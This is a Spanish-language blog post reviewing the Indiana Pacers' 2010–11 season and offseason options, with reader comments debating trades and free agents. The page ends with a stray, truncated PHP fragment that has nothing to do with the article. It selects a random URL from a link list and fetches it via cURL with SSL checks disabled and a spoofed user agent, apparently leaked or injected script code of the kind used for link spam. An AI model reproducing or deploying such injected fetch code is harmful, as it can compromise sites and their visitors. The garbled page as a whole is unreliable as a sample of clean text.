Indiana Pacers: Notable

05 de July de 2011 por txusma

Cuando Jim O’Brian dejó los Pacers estos habían perdido 27 de los 44 partidos jugados y acaban de salir de dos meses horribles con un balance de 9 victorias y 20 derrotas. Como no podía ser de otra manera, O’Brian fue despedido y su lugar lo ocupó el interino Frank Vogel que fue capaz de clasificar al equipo para los Playoffs gracias a un parcial de más del 50% de victorias. Y no solo eso sinó que consiguió que los Pacers dieran mucho más problemas de los previstos en primera ronda a los Bulls.

Vogel primero mejoró el equipo ofensivamente y en cuanto los sistemas fueron asimilados se centró en la defensa. También realizó cambios en el quinteto inicial. Por un lado, Dunleavy pasó al banquillo dejando el sitio primero a Brandon Rush y después al rookie Paul George, y por el otro, Vogel apostó decididamente por Tyler Hansbrough en lugar de Josh McRoberts en una apuesta clara por la juventud y el futuro. A pesar del buen papel de Vogel, este no tiene asegurado ser el entrenador del año que viene y suena Rick Adelman como posible sustituto.

Los Pacers cumplieron su objetivo de principios de temporada: clasificarse para Playoffs, y una vez allí dieron la cara ante el mejor equipo de la liga regular. No fueron tan intrascendentes como se presuponía. De todas maneras, con el equipo joven del que disponen las exigencias serán diferentes de cara a la nueva temporada y más si adquieren algún jugador interesante en el mercado de agente slibres. La 2ª ronda ya aparece en el horizonte.

Lo mejor: El buen papel de Paul George y Tyler Hansbrough, hay que mejorar pero serán importantes en el equipo. El rendimiento del equipo bajo el mando de Frank Vogel. Liberan casi 30 millones en contratos.

Lo peor: Danny Granger ha sido el líder del equipo pero ha firmado una temporada un tanto gris. Tras sus increíbles actuaciones en New Orleans la gente se esperaba algo más de Darren Collison.

Jugando a GM

– De momento, Larry Bird ha conseguido la adición de George Hill en un movimiento muy interesante. Los Pacers ya tienen demasiados jóvenes y la llegada de Kawhi Leonard no aportaba mucho al equipo. En cambio el ex de los Spurs puede ser el escolta titular y el base suplente y mejora cualquier otro escolta que hubiera en el equipo.

– Empecemos con las renovaciones: Solomon Jones y TJ Ford ya pueden ir haciendo las maletas, pero Josh McRoberts, Jeff Foster y Mike Dunleavy se pueden quedar siempre que no se pasen en sus exigencias. Foster ha de cobrar como el tronco que es pero para McRoberts y Dunleavy puede tener unos 4-5 millones.

– Durante toda la temporada han sonado rumores de traspaso para Danny Granger pero yo me lo quedaría. ¿Qué podemos sacar por él que mejore el equipo y no podamos conseguir en el mercado de agentes libres? Aunque Paul George de vez en cuando parezca que puede sustituir a Granger, ese momento aún está un poco lejos.

– Con los 20 kilos libres la primera idea que nos viene a la cabeza es hacer una intentona por David West pero creo que ese fichaje nos dejaría en tierra de nadie. El jugador de 30 años se está recuperando de una grave lesión de rodilla y no creo que supusiera una gran mejora al equipo. Posiblemente nos ayudaría y mucho a entrar en Playoffs de una manera más holgada en la temporada que se presenta pero ¿y luego qué?

– En el verano de 2012, los Pacers mantendrán el mismo núcleo que este año, liberarán 7 kilos más del salario de Posey y tan solo deberán renovar a Roy Hibbert. Será el momento de jugar realmente fuerte. Chris Paul, Deron Williams, Dwight Howard, Brook Lopez, Javale McGee, Michael Beasley, Kevin Love, Eric Gordon, Danilo Gallinari, Gerald Wallace, Steve Nash… La lista de agentes libres es mucho más apetitosa.

Comenta

17 comentarios a esta entrada

  1. Vader dice:
    #1

    Cuidadito con los Pacers que si Bird se mueve bien pueden estar en breve en los puestos de honor de la liga. El único handicap es que no estan en una gran ciudad y los grandes agentes libres pueden preferir otras opciones.

    Si este equipo de cambias a Hibbert por Howard o a Collison por CP3 o Deron Williams te queda un pedazo de equipo.

    Es un equipo que me cae bien y espero que les vaya bien, siempre detras de NY claro… 😛

    Saludos

      Citar

  2. CAMPO2 dice:
    #2

    Lo de Davis west por los Nets parece un secreto a voces, dara gusto ver a Lopez y west en defensa, vaya agujero!!!!!!!!!!!

      Citar

  3. Esteban dice:
    #3

    toda hace supopner que los pacers, seran el equipo que le plante cara al heat durante los proximos 5 o 6 años

    collison, sin ser superlativo, es un base solido, joven y ya super titular, con partidos de play offs ensima, solo puede mejorar de ahora en mas, y quien te dice hacerse un base estrella en los proximos años, una minima mejora en sus numeros y podria hasta ser all star en el este

    hibbert, cada año progresa un poco mas, sus 2.17 mts, lo ponen como un futuro pivot dominante en la nba, no tiene por el momento grandes numeros, pero si es trabajador y se dedica a mejorar, creo q puede ser el pivote q lñe plante cara a howad en algun momento, el parate le permitira mejor mucho, aunque debe mejorar su entrega y sacrificio defensivo

    Hansbrough no sera nunca una estrella, incluso le costara ser un titular constante, pero es un interno capaz, tiene bajo salario es joven y trabajador, puede saltar de la banca, este año ha demostrado mas de lo que podia esperarse de el

    george, es la sorpresa, jugo mejor que la mayoia de los rookies este año, salario bajo, gran altura, enorme defensor, puede jugar de 2 y de 3, quiza no sera nunca un all star, pero su bnajo salario y su espiritu defensivo mlo haran un jugador trascendental en este equipo

    estos 4 jugadores marcan el futuro de este equipo, todas selecciones bajas del draft, bien exploitadas, con contratos vigentes, salarios bajos y experiencia en clasificar y jugar play offs, que mas se puede pedir de un grupo de jovenes? LO MEJOR ES Q NINGUNO ES UNA ESTRELLA PER SE, POR LO QUE SEGUIRAN TRABAJANDO CONSTANTEMENTE PARA MEJORAR

    a esto se le agrega, por ahora, GRANGER, dudo q sea el lider que este equipo necesita, buscaria un trade por un ala pivote, al jefferson? sino, mantenerlo pero rodearlo para que el tiempo no le pese y no baje su rendimiento

    el resto, son todos jugadores baratos y prescindibles, yo no renovaria por ams de un año a dunleavy y mcroberts, si para la proxima temporada y mantener espacio para el proximo libro de pases, RUSH es transferible, su valor es bajo en contrato, pero tiene numeros decentes y es joven

    las posibilidades de traspasos soin ifninitas, la de incorporar ahora o el proximo año angentes libres tambien, se me ocurren infinidades, pero en todas ellas pos pacers se acercan a segunda ronda, y en dos años a pelear por ser el mejor equipo del este

    BIRD ah demostrado ser un buen gm, seguro q sabra q hacer con tanto potencial, tanta juventud y sobretodo TANTO DINERO PARA GASTAR, de el dependera…

      Citar

  4. AndiD dice:
    #4

    Eso de que “serán el equipo que le plante cara al heat durante los próximos 5 ó 6 años” me parece arriesgarse demasiado. De un grupo de jugadores medios no haces un equipo campeón.
    Al Jefferson me parece un hace-números que para nada va a cambiar el rumbo de una franquicia.
    Sí, es cierto que tienen una plantilla compensada y con margen de mejora, pero les hace falta que George explote (y de verdad) el año que viene y hacer una buena campaña para poder pescar algún agente libre en el veranos de 2012.

      Citar

  5. Esteban dice:
    #5

    mejor campaña que la pasada? cuantos equipos pueden entrar a playoffs, tener a todos sus titulares con contratos y tener 20 millones para fichar agentes libres? no muchos, es un equipo barato, joven, con proyeccion y de play offs, creo q es un gran atractivo

    este año no haria fichajes, daria un año mas para q mejoren sus jovenes, entrar nuevamente a plays offs, mejorar su record y seran el equipo mas atractivo para los agentes libres

      Citar

  6. KB # 24 dice:
    #6

    Yo este año renovaría a los que acabasen contrato por un año para mantener a la mayoría para el año que viene. De esta manera en el verano de 2012 estarán con mucho margen y con las jóvenes promesas un año más maduros.

    Pero siguen sin resultarme atractivos de ver!

      Citar

  7. Sempren dice:
    #7

    Todos esperábamos mucho de Collison, pero no hay que olvidar una frase que es casi un hecho: el segundo año suele ser más difícil que la temporada rookie.

    Si sigue progresando, con el fichaje de Hill y el 2012 en el horizonte, el futuro se plantea interesante. Y si Granger vuelve por sus fueros, los seguidores de Pacers pueden soñar con cotas más amplias.

      Citar

  8. troll dice:
    #8

    me jugaría mi cuello a que los Pacers no estarán en Play-Offs

      Citar

  9. Esteban dice:
    #9

    troll estas enterado que los pacewrs ya ficharon a george hill?
    yo juego mi cuello que hill sera el jugador mas mejorado, o el mejor sexto hombre, dependiendo que juege de escolta titular o salte de revulsivo del banco

    acuerdense, george hill llega a los 20 pp por partido este año

      Citar

  10. German dice:
    #10

    Coincido, George Hill es un excelente jugador y ha llegado a un equipo donde seguramente sera titular y tendra mas incidencia ofensiva, no se si llegara a los 20 pts por partidos pero seguramente andara muy cerca. Para mi ess una lastima que se haya ido de San Antonio!

      Citar

  11. Esteban dice:
    #11

    yo dudo que sea escolta titular, creo que le sienta mejor el papel de sexto hombre, reemplazando tanto al base como al escolta, lo que le daria mas de 30 min por partidos, eso siempre y cuando los pacers salgan este año a la carga por jason richarson o caron butler para jugar de escolta, sino hill sera titular y ahy veremos al jugador de mayor progreso de la prox temp

      Citar

  12. CAMPO2 dice:
    #12

    Yo me guardaria el dinero para la temporada que viene, ya que este verano con lo poco que hay de calidad en la agencia libre sera aun precio desproporcionado porque gente como Crawford o Richardson saldran a subasta publica y entre los equipos lo unico que haran sera icrementar el precio .

      Citar

  13. Esteban dice:
    #13

    yo igualmente romperia el mercado y pagaria las fortunas q piden butler y west, y explico por q

    con el progreso y la juventud de este equipo, mas butler, west y hill, los pacers deben ser capaces de meterse en semifinales de conferencia y quien dice si algo mas, dependiendo de como esten NY, ORLANDO Y BOSTON, es decir ser un equipo candidato al titulo

    una vez que el equipo se afianze en la zona alta de la tabla y sea vea atractivo todo es mas facil, sino diganselo a los spurs, veteranos q vienen por el minimo, presiones para ser traspados alli, estadios llenos, dinero de marketing

    creo que la recontruccion ya termino, consiguieron un nucleo joven y dinero para gastar, no pueden demorarse un año mas y arriesgarse a bajas por lesion o bajas de rendimiento, dos fichajes como los antes mecionados le daran el impulso animico a toda la franquicia para volver a ser lo q fue con miller

      Citar

  14. CAMPO2 dice:
    #14

    Gastarias dinero que no podrias gastar el siguiente año en alguien mejor.

      Citar

  15. Txusma dice:
    #15

    Butler y West (con lesiones de gravedad la última temporada), por si solos nunca convertirán a un equipo en aspirante al título. Haría falta una mega estrella de verdad.

      Citar

  16. Esteban dice:
    #16

    quiza si, pero las mega estrellas no abundan, son pocas y no querran jugar en indiana en principio salvo que se hagan candidatos firmes al titulo

    butler y west, no estarian solos, acompañados este primer años por danny granger, collison, hill, george, hasbrught, hibbert,

    el prox año, esta el expiring de posey q son 7 millones, alguien mas cuajaria alli

      Citar

  17. CAMPO2 dice:
    #17

    Con West y Butler les pasaria como a los actuales Denver, que tienen una gran plantilla pero no hay una estrella referente que tire del carro en los momentos clave. porque Granger le pasa como a Iguodala, que como segunda espada de una estrella sera acojonante pero como lider se queda corto

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>